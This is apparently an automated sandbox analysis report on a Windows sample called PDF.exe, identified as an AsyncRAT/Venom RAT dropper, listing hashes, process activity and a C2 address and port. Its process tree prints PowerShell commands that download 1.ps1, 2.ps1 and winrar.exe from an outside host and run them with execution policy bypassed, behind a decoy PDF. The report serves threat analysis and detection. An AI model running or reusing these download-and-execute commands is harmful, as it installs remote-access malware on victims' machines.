Resubmissions
21-01-2025 13:31
250121-qspexswjes 1021-01-2025 12:04
250121-n8tngasrhm 1013-07-2024 12:59
240713-p8a2ss1gpq 10Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
13-07-2024 12:59
Static task
static1
Behavioral task
behavioral1
Sample
PDF.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
PDF.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
PDF.exe
Resource
win10v2004-20240709-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Extracted
http://thelustfactory.com/vns/winrar.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
54.153.17.157:14445
rpujporiumcisxsdyop
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral4/files/0x000200000002ab23-58.dat family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 2 328 powershell.exe 3 328 powershell.exe 11 3940 powershell.exe 15 3940 powershell.exe 22 2968 powershell.exe 24 2968 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1164 winrar.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral4/files/0x000100000002aaf8-70.dat pdf_with_link_action -
pid Process 3940 powershell.exe 3348 powershell.exe 2968 powershell.exe 328 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3732 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3866437728-1832012455-4133739663-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3866437728-1832012455-4133739663-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 328 powershell.exe 328 powershell.exe 3940 powershell.exe 3940 powershell.exe 3348 powershell.exe 3348 powershell.exe 2968 powershell.exe 2968 powershell.exe 1164 winrar.exe 1164 winrar.exe 1164 winrar.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 328 powershell.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 3348 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 1164 winrar.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2184 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1164 winrar.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe 2184 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1816 wrote to memory of 964 1816 PDF.exe 81 PID 1816 wrote to memory of 964 1816 PDF.exe 81 PID 964 wrote to memory of 328 964 cmd.exe 83 PID 964 wrote to memory of 328 964 cmd.exe 83 PID 964 wrote to memory of 3940 964 cmd.exe 85 PID 964 wrote to memory of 3940 964 cmd.exe 85 PID 964 wrote to memory of 3348 964 cmd.exe 88 PID 964 wrote to memory of 3348 964 cmd.exe 88 PID 964 wrote to memory of 2968 964 cmd.exe 89 PID 964 wrote to memory of 2968 964 cmd.exe 89 PID 2968 wrote to memory of 1164 2968 powershell.exe 90 PID 2968 wrote to memory of 1164 2968 powershell.exe 90 PID 964 wrote to memory of 3732 964 cmd.exe 91 PID 964 wrote to memory of 3732 964 cmd.exe 91 PID 964 wrote to memory of 2184 964 cmd.exe 97 PID 964 wrote to memory of 2184 964 cmd.exe 97 PID 964 wrote to memory of 2184 964 cmd.exe 97 PID 2184 wrote to memory of 4876 2184 AcroRd32.exe 100 PID 2184 wrote to memory of 4876 2184 AcroRd32.exe 100 PID 2184 wrote to memory of 4876 2184 AcroRd32.exe 100 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 3144 4876 RdrCEF.exe 101 PID 4876 wrote to memory of 4392 4876 RdrCEF.exe 102 PID 4876 wrote to memory of 4392 4876 RdrCEF.exe 102 PID 4876 wrote to memory of 4392 4876 RdrCEF.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exe"C:\Users\Admin\AppData\Local\Temp\PDF.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E7B0.tmp\E7B1.tmp\E7B2.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Users\Admin\AppData\Roaming\winrar.exe"C:\Users\Admin\AppData\Roaming\winrar.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1164
-
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:3732
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:4876 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EB4D23EC2D68DD757EAD9AAF656E697B --mojo-platform-channel-handle=1792 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3144
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1E6519382304988E107E7929E66FFE68 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1E6519382304988E107E7929E66FFE68 --renderer-client-id=2 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:15⤵PID:4392
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DA84EF54E96B197F1AF341C6841301A5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1496
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E4551B15787F50A49C1DF4714298F73D --mojo-platform-channel-handle=2404 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4860
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D3CB42D618DB037BA03E4451C185000D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D3CB42D618DB037BA03E4451C185000D --renderer-client-id=6 --mojo-platform-channel-handle=1916 --allow-no-sandbox-job /prefetch:15⤵PID:3400
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A576120D4A275972850D4805D028A5C3 --mojo-platform-channel-handle=2736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4328
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3328
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD54279064b1491009ae88e80fa09ac43c1
SHA16609b50c0637915fcd0d627313d1d687e725fd49
SHA2563ac8d46a2d4904d43773d9f911f1af3606ccbe9808f4da1f21fb71a9836a100d
SHA51235ce3bcec15e34a95dce667ebd715eee2deebb1ac55ebc665b9d4854f887c4df7581a20fd194a8a56fded787d659dea582a22b71545b49274969bc713c9fc974
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD55e6baeec02c3d93dce26652e7acebc90
SHA1937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4
-
Filesize
1KB
MD54ba8d03d9d09f8ab05ef694dea36596d
SHA10bb07da9d44b03720127ed9fb46d7de7454fdb79
SHA256ee27d919a2a29e00b65110e779c83803b2d2f9d79fef103729c8ac46cc1f6711
SHA512dfd2299c7950c69a8ed1fef842dd73f8818ba0632e22d34da50a6e531fd7719ef4076a3674c219881255401f4172b5746c7abc206d16206e3960a70b30673f22
-
Filesize
944B
MD59477c6b17e165df5bc813a0045334f06
SHA19f82015955f8ff48b5f6de1e632d9172f6158b37
SHA2562527d86a59885b2013dea921945ea56ed4ef259b06103e82cea5810fb7758e9f
SHA512bf7f3588800eac3db2e14379ae7ca947ba4cb70b3892d43e44568f8276f7e8f8b47ffc6eee8475d76ed19ac1ec119d714f14623c1eebb7f45390ce3b36a78612
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
292B
MD5c45d77f74bf20916eea08e12286d999c
SHA109db885179d853b5a3c1a55acc7cb805d579a2a2
SHA2563fe1c7a75ff9897ee9d4489221e4b6f15632104a8b044bfd77b61d530ba6959b
SHA51229fe904f21d59900b3191554b54da236a2213f1e33a424931346b772bb15a28bf1dec7bcd5641e2637da0cf358ad8fc492ed6dff133f3d53600dc27e1c5d5fd4
-
Filesize
276B
MD5d7ca2ab9bdffd0dc3f8027df9412cbb0
SHA16928881786e0090321783f1bb9d77816336522a5
SHA256f029b124f899b34b0229f1a74a7e46b51b9853c73399a9eb922a13459c79b027
SHA512959c9c4881692eec74e9cca401acad934c16026a0e9102d0abb54ce85703bfae3023abfb68ee70a3ced032aeb124a976efa7fbd0818be61333f0b568f8ccf12e
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288
-
Filesize
78KB
MD59e75fe5e60c15dd6b76e075516968cc3
SHA1fdb181a276c5d02ebc87fe302a4a61feddbeab59
SHA25658cd06e6011f7ce13d7ea4f7a2476c1bae3d3250b704d34030dc11818b7f403a
SHA51268b32885cc715ba8f8c0d3deda2174ebc6f02bc7113bd61ad6b8ef9b8349bf5290882a674ad5322b3a512b409d128e4d5e3a909d4311434d932296579c832cba